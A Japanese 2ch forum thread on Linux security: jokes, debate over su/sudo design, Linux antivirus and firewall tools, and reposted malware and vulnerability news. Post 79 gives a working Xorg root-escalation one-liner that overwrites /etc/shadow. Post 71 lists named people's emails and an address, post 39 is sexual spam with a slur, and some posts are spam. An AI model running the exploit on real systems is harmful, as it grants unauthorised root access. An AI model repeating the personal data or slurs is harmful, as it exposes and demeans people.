Linuxセキュリティ総合スレ [無断転載禁止]©2ch.net (466レス)
上下前次1-新
1(2): 2016/06/12(日)23:17 ID:OMH3td/9(1) AAS
Linuxを安全に使うためにセキュリティについて語りましょう!
2: 2016/06/12(日)23:38 ID:yP8FUEwn(1) AAS
インターネットに繋がない
3: 2016/06/13(月)06:09 ID:eDU8tci1(1) AAS
電源を入れない
4: 2016/06/13(月)10:29 ID:Oh9pGuME(1) AAS
気にしない
5: 2016/06/13(月)11:01 ID:2M58TAyx(1) AAS
SAKOKU を使う
6(1): 2016/06/13(月)11:57 ID:J1aqrsrp(1) AAS
勝つためには戦わないこと(´・ω・`)
7: 2016/06/13(月)12:21 ID:8nJEuh/y(1) AAS
手始めにiptableから乗り換える話書けや
8: 2016/06/13(月)15:37 ID:0TZsX1cx(1) AAS
セキュリティ総合ってことはウィルス対策もここでいいよね?
9: 2016/06/13(月)20:55 ID:j5ciL7QT(1) AAS
そもそもLinux使うこと自体が対策に成り得る
10: 2016/06/13(月)22:05 ID:Qr5Zi0oD(1) AAS
サイバーノーガード戦法だ
11: 2016/06/13(月)22:14 ID:K9ELyhAn(1) AAS
nftの情報仕入れることを期待してたんだけど、セキュリティのスレなのな。
最近nftに移行はしたけど、iptableで指定した項目が全て移せたわけではないな〜。
12: 2016/06/13(月)22:30 ID:THPCncF9(1) AAS
重複
2chスレ:linux
13: 2016/06/20(月)09:45 ID:EE0G5RY5(1) AAS
UACが欲しい(´・ω・`)
14: 2016/06/27(月)21:17 ID:1MSZfZlD(1) AAS
代わりにキーリングをあげよう
15: 2016/07/08(金)22:16 ID:nKTBpDXx(1) AAS
ぱんつくれ !
16: 2016/07/11(月)20:45 ID:1UAhQw4h(1) AAS
(´・ω・`)・ω・`) キャー
/ つ⊂ \ 怖いー
17(1): 2016/07/16(土)12:23 ID:az2Lvjtg(1) AAS
make pan
18(1): 2016/07/28(木)14:39 ID:vgMn1AfM(1) AAS
残念ながらいくつかの解決が困難な問題のせいで今やUnix/LinuxよりWindowsのほうが遥かにセキュアだからな。
被害が少ないのはただ単に狙われてないからってだけ。
1.su/sudoが糞
glibcの脆弱性GHOSTの発見に関わった人のコメント
外部リンク:www.openwall.com
> If it would be permitted for a non-root user to su to root, then anyone who could have compromised the user's account[1] would also be able to hijack a su session[2] and then su to root himself.
> [1] Such a compromise could occur in a variety of ways: Web/FTP/etc.
> client vulnerabilities, password snooping, etc.
> [2] For example, edit the user's shell startup scripts to make su an alias for a custom su wrapper program.
外部リンク:www.openwall.com
> unfortunately both su and sudo are subtly but fundamentally flawed.
> So the separation between the non-root and the root accounts is lost.
suやsudoを使える非rootのアカウントが攻撃者に侵入された時点で、攻撃者はそのアカウントの~/.bashrcなどにパスワードを盗むラッパーを実際のsu/sudoのaliasやfunctionとして仕込んだり出来る。
次に正規のユーザーがsu/sudoを使おうとすると攻撃者の仕込んだラッパーが実行され攻撃者はパスワードを得ることが出来、あとは攻撃者もsu/sudoを使い放題となる。
結果としてこれらのツールのせいでrootと非rootというユーザーの分離という一番基本的なセキュリティさえ無意味になっている。
19(2): 2016/07/29(金)08:18 ID:3v5CyHDC(1) AAS
じゃけんSELinux使いましょうね
20: 2016/07/29(金)11:43 ID:c3kWqYGY(1) AAS
セキュリティ対策がはっきりしない以上Win使いしかいない
でもw10こわいわー
21(1): 2016/07/29(金)12:00 ID:r5rsVV/0(1) AAS
>>18
侵入された時点でおしまいだろうに何言ってんだこいつって感じですかね。
22: 2016/07/29(金)15:11 ID:2cIkyZpH(1/4) AAS
>>21
今の時代は「侵入された時点でおしまい」が許されないからこそブラウザとかはseccompやnamespaceを駆使して仮に脆弱性経由で何かコードが実行されても被害を最小限に食い止めるようにsandbox化に力を入れてたりするんだが
そもそもそれが許されるなら、一人で使うデスクトップ用途ではUbuntuみたいなわざわざ「普段非rootでログインして必要な時だけsu/sudoでrootになって実行する」
っていう行動にはセキュリティ的には何の意味もない、最初からrootでログインしてそのままエロサイト巡りしても何ら問題ないって事になるのは理解できるか?
もっとも昔はそれでも問題ないレベルだったのでWindowsではAdministratorでのログインがデフォになってたわけだが
そのあたりをきちんと理解しないで「Unix/LinuxはWindowsよりセキュアなんですーー」で思考停止してる馬鹿が大多数のせいで今の現状があるわけだ
その間にWindowsは、UACのように権限を得るためにはきちんとそれぞれへの入出力の機密性やコマンド自身の完全性をきちんと確保して「異アカウント間の分離」を破壊しないように考慮したり、
ILのように同アカウント内でもきちんとプロセス間を分離して保護(これは>>19の言うように強制アクセス制御で"一部"は解決できる)することでよりセキュアに進化した
一方残念ながら思考停止したUnix/Linuxは、権限を得るために「何の保護もない環境」から実行される「何の保護もされてないsu/sudoコマンド」に対して「何の保護もされてない状態でパスワードを入力する事」状態が放置され、
その一番基本的な「異アカウント間の分離」すら無意味になってる体たらく
結果的に「(sudoが使える非rootユーザーが)侵入された時点で(システム全体が)おしまい」になってるので、一周回ってお前の言ってることも正解なわけだがな
23(1): 2016/07/29(金)15:40 ID:2cIkyZpH(2/4) AAS
一応フォローしとくとLinux kernel自体は割ときちんと進化してるな、NXとかASLRとかYamaとかLSMとか
きちんと設定されてなかったり(互換性のせいで出来ない)、ユーザーランドが糞の寄せ集めなせいで台無しだが
24(1): 2016/07/29(金)16:57 ID:AresjTJd(1) AAS
うんそれはご説ごもっともなんだけどさ、ただ危ないぞって騒ぐだけじゃなくて被害に遭った卑近な例とか挙げられないのかな?
卑近なって言ってもあなたの身近な人じゃなくてネットで皆の目に触れるようなブログやフォーラムでいいんだ。
xpが終わる時にデスクトップLinuxがって騒いでから、Linuxといえどのほほんとしてられないってのはみんな思ってることなんだ。
だから知りたいのは、いかに危険か、ではなく、危険なブツに出くわした時にどうすべきか、出くわした人はどう対処したか、なんだよ。
開発に携わった人のブログやコラム見つけて危険だ危険だって焚き付けるのなんて思考停止してもできることだろ?
LinuxユーザーがWindowsは危険だと騒ぐのが思考停止ならWindowsユーザーがLinuxは危険だと騒ぐのもまた思考停止じゃないの?対策を示すとか何かしない限り。
まるで、ゲームのバグを見つけたからプランナーや開発者より自分の方が優秀だって威張ってるデバッガーみたいだよ君は。
25: 2016/07/29(金)17:23 ID:2cIkyZpH(3/4) AAS
>>24
俺みたいなゴミクズには解決する力も政治力もないから2chみたいな掃き溜めでグチってんのよ
Linux好きだから改善してほしいし、もし同じように問題だと感じる人が増えてくれれば改善される可能性も増すしね
そのために敢えて居丈高にLinuxに厳しくWindowsに甘く書いたんだ、ゴメン(´・ω・`)
26(1): 2016/07/29(金)17:53 ID:53ApPnD4(1) AAS
windowsが仮に安全つうのは
あることするには続きは窓操作も必要だからじゃね?(あるいは暗号のようなパス書かないと辿れないとか)
そういう不便さを有難くセキュリティーが強いというのかどうか
27: 2016/07/29(金)19:36 ID:IWyIiLvv(1) AAS
Windowsがセキュリティーを確保しているのは専業のベンダー各社が競争に晒されながら製品を開発しているからであって、Windows自身が特段セキュリティに優れる訳じゃない
28(1): 2016/07/29(金)21:02 ID:2cIkyZpH(4/4) AAS
外部リンク:blog.martin-graesslin.com
KDEの開発の人とかちゃんといまのXやシェルとかの実行環境には問題があることを認めてどうしたら良いか考えてる人もいるんだよなー
でも自分の開発してるソフトウェアだけが対応してもshellとかの他のソフトウェアのせいでそれが無意味になっちゃったりで困ってる
29: 2016/07/30(土)13:47 ID:m4BHHueF(1/2) AAS
強制アクセス制御だけでハッキングを防御できるの?できないの?
それと、強制アクセス制御のステータスってのは何らかのファイルにロギングされんの?
30: 2016/07/30(土)13:54 ID:m4BHHueF(2/2) AAS
Linuxなんてのは宮大工が構築した接ぎ木細工のようなもの。
ノーガードきめこんで運用してたら、そりゃあ狙われた時に簡単にクラッシュしますがな。
(肝心な釘打ち無しで構築してるもんだから)
Windowsの世界ではねセキュリティソフト入れて丸投げしてるわけ。
但し、ユーザーの中には変わり者がいて、ノーガードな奴もいる訳、
まあ、他人ごとでどうなろうが知ったことじゃないが…
31(1): 2016/08/13(土)02:05 ID:oD+tGgzq(1) AAS
LinuxのTCPに脆弱性、トラフィックを乗っ取られる恐れ
外部リンク[html]:www.itmedia.co.jp
32(1): 2016/08/13(土)04:51 ID:aN9vHd6i(1) AAS
>>31
すぐ更新されるから慌てなさんな
33: 2016/08/13(土)08:48 ID:TXBKXjH8(1) AAS
>>32
2012年からあった脆弱性がすぐに修正されるの?
34: 2016/08/13(土)08:55 ID:1K0xoI1z(1) AAS
すでにパッチは出ているぞい
35: 2016/08/13(土)11:19 ID:UrcrvCqb(1) AAS
大して重要じゃないと思われてたから放置されてただけで、
修正が難しいわけじゃないのだろう。
36: 2016/08/14(日)13:17 ID:gduCaAAf(1) AAS
「誰も気づかなかったけど2012年からひっそり存在していた物が今発見されてすぐに修正された」
だろ
37(1): 2016/08/14(日)14:21 ID:IM019vfG(1) AAS
日本の官公庁のサーバのセキュリティってまともなの?
38: 2016/08/14(日)18:52 ID:fe3iWrgq(1) AAS
>>37
自分で確認したら?ガバガバだから。ただし、法令違反で引っ張られないように工夫しろよ。
官公庁はWindows serverじゃないの?
39: 2016/09/03(土)02:42 ID:T3i7Gd65(1) AAS
アグレックスって その13
なんで飲み行かないの?
なんで女の子誘って飲みに行かないの?
声掛けないと飲みいけないのに。
話しないと恋は始まらないよ。
声掛けないとSEXもさせてくれないのに。
声掛けないから、
ヤンキーみたいなオジサンが誘いだして大きなこと言って、不倫してるよ。
女の子誘って飲みにきなよ。
女の子に声掛けないと、恋も出来ないよ。
SEXしたかったら、声掛けて飲みに行きなよ。
残業してる間に、持っていかれちゃってるよ。
後ろから見たら、がに股になってる女の子見たことない?
SEXしたかったら、なんでもいいから声掛けて飲みに行きなよ。
残業しても恋はできないよ。SEXできないよ。
恋をしなけりゃ、SEXはさせてもらえない。
恋をするには、話して気に入ってもらうしかない。
気に入ってもらうには、飲み行くのが近道だろ。
別に会議で、大きな事言ってもいいけど。
どうせSEX出来るまで何度も繰り返すんだろうから、
そのうち年配の方々にめんどくさがられて、遠くに飛ばされるよ。
そんなだったら、飲みに行くのが一番だろ。
別にがに股のさせこちゃんを探して、お願いしてみてもいいけど。
ばれたとき、周りの目が厳しいぞ。
お前が呼ばないから、ほらみろ可愛い子はみんなやられて。
残っているのはブスばかりになってるじゃないか。
ブスはキツイぞ。
誘えないなら、韓国人でも買えよ。みんなそうしてるぞ。
40(1): 2016/09/06(火)16:46 ID:vVf8gi4f(1) AAS
clamAVでは不安だお(´・ω・`)
41: 2016/09/06(火)22:53 ID:TopTMWtn(1) AAS
>>40
なんでよ?シスコ様だぞ?
42: 2016/09/07(水)07:09 ID:O110MSh/(1) AAS
常駐じゃないと安心できないマン
43: 2016/09/13(火)10:37 ID:g0CBlyhH(1) AAS
常駐か駐留か進駐か それが問題である
44(1): 2016/09/17(土)18:12 ID:9GLGaOH4(1) AAS
ギブミーチョコレート
45: 2016/09/29(木)12:32 ID:ZwQJlT8x(1) AAS
尻|ω゚ )┻┛身動きとれんのだが・・・
46: 2016/09/29(木)12:44 ID:5wiRFmuo(1) AAS
NOTIFY_SOCKET=/run/systemd/notify systemd-notify ""
47: 2016/09/29(木)12:54 ID:lvJNOdKb(1) AAS
最強のiptablesの設定をうぷしてくれる神いないの?
48(1): 2016/09/29(木)20:57 ID:SWTYFo2r(1) AAS
firewalldに乗り換えれ
49: 2016/10/04(火)17:05 ID:ZgAPWl/3(1) AAS
>>48
乗り換えると最強になるの?
50(1): 2016/10/04(火)21:10 ID:MfnjwfuN(1) AAS
設定が簡単になるから、「設定をうぷしてくれ」とは思わなくなる
51(1): 2016/10/23(日)10:01 ID:PWQ2IPcX(1) AAS
>>50
出て行く通信のフィルタを書くためには
結局IPTABLES書かなきゃいけないのはなおった?
なおったなら乗り換える。
52: 2016/11/30(水)12:37 ID:SfHGIzEu(1) AAS
AA省
53: 2017/01/20(金)17:47 ID:OITYnSWZ(1) AAS
AA省
54(1): 2017/02/01(水)08:09 ID:gwo76No6(1) AAS
AA省
55: 2017/02/13(月)20:59 ID:aKHZLuDZ(1) AAS
顔がでかいなぁ・・・
56: 2017/03/08(水)21:47 ID:TuQ4x/Y7(1) AAS
AA省
57: 2017/04/19(水)13:43 ID:kexeXY6M(1) AAS
(´・ω・´・ω・ω・`)知らんがなトリオ
58: 2017/04/28(金)16:59 ID:ZiXyj8JT(1) AAS
Linuxの方がWindowsよりもセキュアだっていうのは
過去の話なんすね。それなのに未だにLinuxを
安全って紹介してる所ばかりなのは何でですかね
59: 2017/04/30(日)00:21 ID:zhwkJ+1u(1) AAS
Linuxで被害出たという報告は少ないでしょ
Windowsでは散々あるけど
60(1): 2017/04/30(日)00:36 ID:3yi8UZQK(1) AAS
使う奴のスキル/知識レベル次第だから、OSが解決できる問題じゃないよ
61: 2017/04/30(日)14:38 ID:6nvs6+SR(1) AAS
んだんだ !
62: 2017/04/30(日)19:21 ID:K1kIRV9a(1) AAS
clamとかselinuxとか、皆さん使っていますか?
マシンの使用用途によりけりだとは思いますが、
僕の自宅鯖はfail2banだけです。
有用な物や便利な物があれば教えて欲しいです。
63: 2017/05/09(火)10:29 ID:6kIUOBHa(1) AAS
他人のサーバ管理してるけど、
今までosの脆弱性突かれてどうこうてのは
無いなあ
過去10年起きたのは、全てユーザーの問題
クソみたいなパスワード突破されたとか、
ゴミみたいなコードからのインジェクションとかのみ
64: 2017/06/16(金)09:15 ID:Cv6QgGNP(1/2) AAS
今年も夏を乗りきれず逝く小型PCがいるのでしょうね
65: 2017/06/16(金)09:16 ID:Cv6QgGNP(2/2) AAS
誤爆失礼
66(2): 2017/07/03(月)23:36 ID:cDHqg+NI(1) AAS
openssl enc -e -aes256
で暗号化してたファイルが、急に、
openssl enc -d 〜
で開けなくなりました。
ファイルが壊れたかとめちゃくちゃ焦ったけど、
タイムスタンプは去年のまま変化なし。
本家から、1.0.2lを落としてコンパイルした実行ファイルからだと
問題なく開けたからファイルの問題ではない模様。
1.1.0のバグですか?
#確か2ヶ月前ぐらいだとパッケージインストールされている
1.1.0系でも問題なかったはずですが。
linux-mint(ubuntu16.04)です。
67(2): 2017/07/04(火)01:23 ID:RdyHvcf/(1) AAS
>>66
くだらねえ質問はここに書き込め!Part 228
2chスレ:linux
で聞いたほうが良いと思う
68: 66 2017/07/05(水)00:22 ID:uEgHtGC3(1) AAS
>67
ありがとう。
次回からそうするわ。
ちなみに、今回のは下記参考に自己解決したっぽい。
-md md5付けたら、現行1.1.0でもファイル開けました。
外部リンク:github.com
外部リンク:unix.stackexchange.com
69: 2017/09/07(木)19:37 ID:NhVQ+S22(1) AAS
すまん誰か教えてくれ!
全くセキュリティーパッチを充てていないrhel6.1で、poodle対策をしなきゃいけないんだが、
設定変更だけで対処する場合は、ssl.confのcipherのところに -sslv3入れるだけで良い?
70: 2017/10/16(月)19:17 ID:AvEU8VfP(1) AAS
AA省
71: 2017/11/03(金)21:09 ID:UMEHXcXh(1) AAS
【 日立製作所 】焦土戦
セキュリティの基本は尖らないこと、目立たないこと。隠すこと。 バカ。
新名主 隆志 TIS shimmyozu.takashi@technopro.com
色田 眞吾 日立製作所 Shikita.Shingo@technopro.com
八木 一暢 TIS yagi.kazunobu@technopro.com
水野 潤 ハマゴムエイコム Mizuno.Jun@technopro.com
佐々木 優也 (首都圏第1支店案件) sasaki.yuya@technopro.com
佐々木 健太 日立製作所 sasaki.kenta@technopro.com
中野 洋行 NSSLCサービス Nakano.Hiroyuki@technopro.com
永井 真祐子 富士ソフト nagai.mayuko@technopro.com
品川区高輪3-25-33
都内のトイレに花子さんだ
日立の末端は、ただの派遣会社だからな。メーカーはどこも一緒か。。
72: 2017/12/29(金)13:14 ID:S/CsVkMC(1) AAS
誰でも簡単にパソコン1台で稼げる方法など
参考までに、
⇒ 『宮本のゴウリエセレレ』 というブログで見ることができるらしいです。
グーグル検索⇒『宮本のゴウリエセレレ』
HRT6GIPYTB
73: 2018/04/11(水)07:03 ID:9VtMkuZE(1) AAS
AA省
74: 2018/05/22(火)11:10 ID:Czl6p0FW(1) AAS
僕の知り合いの知り合いができた副業情報ドットコム
関心がある人だけ見てください。
グーグルで検索するといいかも『ネットで稼ぐ方法 モニアレフヌノ』
BTBIK
75: 2018/05/26(土)09:20 ID:c6Ml0Dod(1) AAS
【緊急】LinuxベースのルーターやNASに感染するマルウェア「VPNFilter」、54カ国50万台に感染か
2chスレ:news
76: 2018/05/26(土)12:43 ID:H0+abEbN(1) AAS
大問題じゃないか
77: 2018/05/27(日)16:31 ID:QzfBv+yQ(1) AAS
Windowsのセキュリティにはうるさい犬厨もそっ閉じ。つまり、犬問題w
78: 2018/07/08(日)20:50 ID:QTYf4jMn(1) AAS
AA省
79: 2018/10/31(水)11:46 ID:XLo7vX23(1) AAS
suid付きXorgを使ったroot昇格法
外部リンク:www.exploit-db.com
cd /etc; Xorg -fp "root::16431:0:99999:7:::" -logfile shadow :1;su
xorgはフォントパスのリストをそのままログに書き込むことを利用してる
(shadowが上書きされるので試すならshadowのバックアップを取ってからどうぞ)
80: 2019/03/10(日)12:39 ID:BHkfBLF0(1) AAS
AA省
81: 2019/05/24(金)01:31 ID:WQ5DwMzT(1) AAS
彡⌒ ミ
( ´ ・ω・) 呼んだ ?
82(3): 2019/05/31(金)12:30 ID:bdQbsGXY(1) AAS
Linuxを狙うマルウェア「HiddenWasp」に注意 2019/05/31 06:55 後藤大地
外部リンク:news.mynavi.jp
Intezerは5月19日(米国時間)、Linuxシステムを標的とした新しいマルウェア「HiddenWasp」を
発見したと「Intezer - HiddenWasp Malware Stings Targeted Linux Systems」で伝えた。
このマルウェアは現在も活動を継続しており、主要なアンチウィルスシステムで検出することが
できないと指摘されている。発見されたHiddenWaspの主な特徴は以下の通り。
・Linuxマルウェアの多くは仮想通貨マイニングやDDoS攻撃に焦点を当てているが、HiddenWasp
は異なっている。HiddenWaspはトロイの木馬として設計されており、標的のシステムを純粋に
リモートコントロールするために開発されている
・HiddenWaspに感染しているユーザーはすでに標的型攻撃のターゲットになっている可能性が
高い
・HiddenWaspはMiraiやAzazelルートキットといった入手可能なオープンソース・マルウェア
から大量のソースコードが流用されている
・HiddenWaspは中国のマルウェアファミリーに強い類似性があるものの、帰属に関しては可能
性が低いと見られる
Intezerは、Linuxを標的としたマルウェアは時間の経過とともにますます複雑になり続けている
と指摘。現在、一般的な脅威でも検出率があまり高くないが、より高度な脅威はさらに検出率が
低いという。今後、Linuxを標的としたマルウェアはさらに検出が難しくなるおそれがあり、
注意が必要。
83(6): 2019/06/01(土)00:37 ID:/N3jDoCj(1) AAS
>>82
これはひどい
俺が唯一Linuxに移行できない理由がアンチウイルスソフトだからな
Windowsのノートンみたいに完璧なのがあれば、ノートン一つで完全に防げるけど、
Linuxにはこれがないからな
SophosAntiVirusがあるが、なぜか定義ファイルの更新が20日異常ないぞ(気のせい?)
RKHunter、Tripwire、Lynis、Firewallとかだけとかありえんだろ?
84: 2019/06/01(土)03:51 ID:BeN0lDY7(1) AAS
Linuxだから安全です。
85(2): 2019/06/01(土)08:23 ID:0WGBvA8D(1) AAS
ウィルス検体を各所に送り対応が早いとこは半日だったが
ノートンは3日後だったことがあった
86(2): 2019/06/01(土)23:05 ID:aQmSSgBv(1) AAS
>>83
毎日更新してるんじゃないかな
ノートンやトレンドマイクロが対応してない最新のウィルスを先んじて検出したことがあったし、古い日付になってる定義ファイルはベースとなるやつの日付だと思ってる。
87: 83 2019/06/02(日)01:29 ID:Zexh2AIq(1/2) AAS
$ sudo /opt/sophos-av/bin/savupdate
次のバージョンをアップデート中です - SAV: 9.15.1、エンジン: 3.74.2、データ: 5.63
Updating Sophos Anti-Virus....
Updating SAVScan on-demand scanner
Updating Virus Engine and Data
Updating Manifest
Update completed.
次のバージョンにアップデートしました - SAV: 9.15.1、エンジン: 3.74.2、データ: 5.63
sdds:SOPHOS からの Sophos Anti-Virus のアップデートに成功しました
$ sudo /opt/sophos-av/bin/savdstatus --version
Copyright 1989-2018 Sophos Limited. All rights reserved.
Sophos Anti-Virus = 9.15.1
ビルドのリビジョン = 2793374
脅威検出エンジン = 3.74.2
脅威データ = 5.63
検出脅威数 = 35620036
脅威データリリース日 = 2019年05月07日 00時00分00秒
前回アップデートを確認した日時 = 2019年06月02日 01時01分28秒
と脅威データリリース日がずっと5/7のままなんだよね
これでも最悪1日毎には更新してるのかね?
ノートンだと1時間に1回は更新してるっぽいけど
更新しててくれてると助かるのだが
88: 83 2019/06/02(日)01:30 ID:Zexh2AIq(2/2) AAS
>>85-86へね
89: 83 2019/06/03(月)00:52 ID:LINEVdyy(1/2) AAS
>>85-86
ここ見たらやはり1日1回ぐらいは更新されてそう
実際俺のSophosは普通に6/2更新されてた
どうも"脅威データリリース日 = 2019年05月07日 00時00分00秒"と
ウイルス定義ファイル更新日は違うらしい
ウイルス定義ファイル更新日もちゃんと書けよ>Sophos
Sophos Anti-Virus: ウイルス定義ファイル (IDE ファイル) が最新の状態にアップデートされているかどうかを確認する方法
外部リンク:community.sophos.com
90: 2019/06/03(月)02:02 ID:jJq3PPoG(1/2) AAS
野良アプリをたくさん入れるWindowsではウイルス検知ソフトが不可欠だね。
91: 2019/06/03(月)02:06 ID:jJq3PPoG(2/2) AAS
しかし、経験上、ウイルス検知ソフトはそれほど当てにできない。
世に知れ渡っていないウイルスが仕込まれていた場合に
ウイルス検知ソフトがそれを正しく検出してくれることはまれ。
何ヶ月か何年かあとになって改めてチェックしてみると検出される場合がある。
でもダウンロードあと、そこまで待ってインストールする人はいない。
92: 2019/06/03(月)08:05 ID:eMJGOUo4(1) AAS
>>82
これの元記事によるとvirustotalで引っかからない
画像リンク[png]:www.intezer.com
つまりノートンだろうが何だろうが脅威としないで放置されるということ
感染経路はわからんが野良危険ということだろう
93: 2019/06/03(月)22:51 ID:sgwkICkl(1) AAS
>>82
これは具体的にどう注意したらいいんだ?
94: 83 2019/06/03(月)22:56 ID:LINEVdyy(2/2) AAS
やはり、Sophosのウイルス定義ファイル更新は1日1回はあるな
↓となってるから(途中に更新あったかは知らんが多分ないだろ)
昨日
<published>2019-06-02T13:03:35</published>
今日
<published>2019-06-03T13:07:34</published>
95(1): 2019/06/04(火)11:45 ID:JnEdCGFR(1) AAS
ソフォス個人情報入れないとダウン出来ないの?
96: 83 2019/06/04(火)23:57 ID:8eAlB9kG(1) AAS
>>95
全部、適当に入れればいいよ
メアドは@と.orgとか.comは入れないとだめだけど、これも適当で大丈夫
97: 2019/06/05(水)09:35 ID:2u//H+UO(1) AAS
電話番号とか住所も?
98(1): 2019/06/05(水)21:45 ID:1PL8mpQb(1) AAS
電話番号、住所って書く欄あったっけ?
あったとしても、100%適当で通るよ
役職・法人名も適当でおk
国、県、郵便番号は日本、東京、1000000でおk
ちなみにLinux版はこれね
外部リンク[aspx]:secure2.sophos.com
外部リンク[aspx]:www.sophos.com
ここからいって普通に全部適当に入力しおわったら、自動でダウンロード始まるよ
99(1): 2019/06/06(木)13:34 ID:Vt0/9sNy(1) AAS
>>98
都道府県がなぜか受け付けてくれない
100(1): 2019/06/06(木)20:22 ID:yFuR+pcY(1) AAS
>>99
先に国名で「日本」選んだら都道府県欄に▲▼が出て、普通にマウスクリックで「Tokyo」が選べるようになるでしょ
国名: 日本
都道府県:Tokyo
郵便番号:100-0000
で大丈夫だよ
101: 2019/06/07(金)09:06 ID:boyNvVP0(1) AAS
>>100
▲▼が出てこない
102: 2019/06/07(金)20:09 ID:/Sk2vmHZ(1/2) AAS
ブラウザでsophos.comのCookeiとJavaScriptオンにしないとだめだよ
オフになってるんじゃない?
103: 2019/06/07(金)21:33 ID:yVEJ6IS3(1) AAS
Symantec Endpoint ProtecitonmpLinux用クライアントをインストールしてみたんだが、あかんファイルは警告無く消し、しかも事後報告が無いのな
これはちと使えないわ
104: 2019/06/07(金)23:40 ID:/Sk2vmHZ(2/2) AAS
Symantecのって無料版あったっけ?
105: 2019/06/08(土)02:35 ID:/huWGbTD(1) AAS
Symantec Endpoint Protection for linux良さそうだが、
1年間9500円アップグレード4700円って高いな
ライセンスだけでメンテナンス不要版もあるの?
値段はここの43ページ
外部リンク[pdf]:www.symantec.com
106: 2019/06/10(月)15:44 ID:9N/TTeW/(1) AAS
LinuxでUEFIスキャナーがついたアンチウィルスソフトってありますか?
ESETはWIn版にはあるみたいだけど、Linux版にはないみたいだし。
UEFIの脆弱性(Intel ME)を考えたらLinuxパソコンの最大の弱点はUEFIだと思うのですが。
オープンソースで誰か作ってくれないかな・・・
107: 2019/06/18(火)02:35 ID:AVJfVicP(1) AAS
マイクロソフト、Azure顧客にEximワームに注意を呼びかけ
Catalin Cimpanu (ZDNet.com) 翻訳校正: 編集部 2019年06月17日 10時47分
外部リンク:japan.zdnet.com
Microsoftは米国時間6月14日、「Exim」経由で拡散するLinuxのワームについて、一部の
Azureも影響を受けるとしてAzure顧客向けに警告を出した。
このワームは米ZDNetが6月13日に最初に報じ、その後詳細情報がレポートされたもので、
CVE-2019-10149の脆弱性を利用してEximメールサーバーに感染する。この脆弱性は、悪用
されると攻撃者が遠隔からコマンドを実行してパッチを当てていないシステムを乗っ取る
ことができるというものだ。
ワームはこの脆弱性を利用してサーバーを乗っ取り、他のサーバーをスキャンして感染を
広げようとする。そして乗っ取ったホストに暗号通貨マイニングを投下する。
Eximはメール転送エージェント(MTA)で、Linuxベースの電子メールサーバー上で動かし
送信者から受信者に電子メールのリレーを行う。このワームはEximが動くサーバーを狙う。
Microsoftが14日に出した警告によると、Azureインフラもこのワームの影響を受けると
いう。幸い、Azureインフラは「このワームの拡散を制限するのを助けるための制御」を
敷いているとMicrosoftは述べている。(後略)
108(1): 2019/06/18(火)17:26 ID:6P/bvjY8(1) AAS
Netflix報告: Linux Kernel又はFreeBSDのリモートから攻撃可能な脆弱性(TCP SACK
PANIC) (CVE-2019-11477, CVE-2019-11478, CVE-2019-11479, CVE-2019-5599)
2019年6月18日 05:11 Kazuki Omo
外部リンク[html]:security.sios.com
こんにちは。SIOS OSSエバンジェリスト/セキュリティ担当の面 和毅です。
06/17/2019にNetflixからFreeBSDとLinux Kernelに対して、幾つかのTCPの脆弱性に関する
アドバイザリーが出されました(CVE-2019-11477, CVE-2019-11478, CVE-2019-11479,
CVE-2019-5599)。アドバイザリーは最小セグメントサイズ(MSS)とTCP SACKに関するものに
なります。最も深刻な「SACK Panic」と呼ばれるものは、最近のLinux Kernelにリモート
からKernel Panicを引き起こすことができます。Netflixの方でPatchも提供されています。
今後も情報が出てくると思われますので、こちらで取り上げます。
逐次情報は更新していく予定です。
109: 2019/06/22(土)09:34 ID:BWxAJ8Sj(1) AAS
>>108に関連して、アップデートが大量に来ている。
また、
◆snapアプリのアップデートはaptコマンドでは不可能である。
初心者向けに、Ubuntuを例にセキュリティーアップデートの手順を示す。(Kubuntu、Xubuntu、LubuntuなどのUbuntuフレーバーたちも同じ)
(1)ターミナルを開き、下記のコマンドを打ち、最新情報を取得する。
$ sudo apt update
(2)最新の情報が取得され、システムは最新ですとの表示が出たら(4)に飛ぶ。もし、アップデートの必要のあるパッケージがあることが示されたら、次のコマンドを打ち、パッケージをダウンロードしてインストールする。
$ sudo apt -y upgrade
ちなみに「-y」オプションは付けても付けなくても良いが、付けなかった場合には、インストール直後に本当にインストールして良いを[Y/N]と表示して確認してくる。この場合はYesを意味するYを押すことでインストールが始まる。
「-y」オプションを付けるとこの手順が飛ばされてダウンロードが完了次第、すぐにインストールが開始される。
(3)次の2つのコマンドは、それぞれ上記のコマンド実行の結果として、不要となった古いパッケージ、不要となったキャッシュを削除する。掃除であるから実行はたまにで良いが、ストレージ容量が少ない環境の人は頻繁にやるべきだろう。
$ sudo apt autoremove
$ sudo apt autoclean
(4)次にsnapアプリの更新を行う。
$ sudo snap refresh
snapアプリをインストールした覚えが無くとも、システムがsnapを使っているため必ず実行すること。例えばGNOMEシェルはsnapであり、Ubuntu18.04.x LTSはすでに更新の必要が出ているので、未実行であれば直ぐに実行し最新版にしよう。
GUIからはすべてのアップデートや掃除はできない。取り分けsnapは(4)の手動アップデートでなければ更新できない。
出来るだけ毎日、しっかりアップデートを行い、セキュアなLinuxライフを送ろう。
110: 2019/07/03(水)23:55 ID:OptOlEBI(1) AAS
>>1
Linuxなんて使わない。
以上。
111(1): 2019/09/29(日)21:20 ID:Nip3Jzi1(1) AAS
彡⌒ミ
(,,・_・).。oO( 毛深くなりたい・・・ )
ヾ(,_uuノ
112(1): 2019/10/13(日)01:09 ID:ueikBXbu(1) AAS
Google、Androidアプリでアップデートを各ユーザーに強制する方法を発表 | TechCrunch Japan
外部リンク:jp.techcrunch.com
113: 2019/10/25(金)00:20 ID:j4GkuklA(1) AAS
>>6
それ違う
負けないためには、だね
コモドでいいよな?
114(1): 2019/12/12(木)00:50 ID:jaG34Ck9(1/2) AAS
IntelのCPUに脆弱性 [402859164]
2chスレ:poverty
供給電圧を変化させてプロセッサを攻撃する新ハッキング手法「プランダーボルト」が発見される | TechCrunch Japan
外部リンク:jp.techcrunch.com
Plundervolt
外部リンク:plundervolt.com
17 名前:番組の途中ですがアフィサイトへの転載は禁止です (ワッチョイWW 2bc5-3D6L)[sage] 投稿日:2019/12/11(水) 21:19:15.97 ID:x8hKACYL0
電圧変えて何すんのよ
システムダウン?
19 名前:番組の途中ですがアフィサイトへの転載は禁止です (ブーイモ MM39-B8XO)[sage] 投稿日:2019/12/11(水) 21:24:40.54 ID:/b3E3oTYM
>>17
プロセッサ内で隠蔽されている暗号鍵を取得する。Blurayの暗号鍵もインテルの脆弱性で割れた
26 名前:番組の途中ですがアフィサイトへの転載は禁止です (アウアウエー Sa13-MFI9)[sage] 投稿日:2019/12/11(水) 22:31:10.46 ID:g2xDg2x0a
>>17
エラーが起きたと思って秘匿領域のデータをダンプするんだってさ
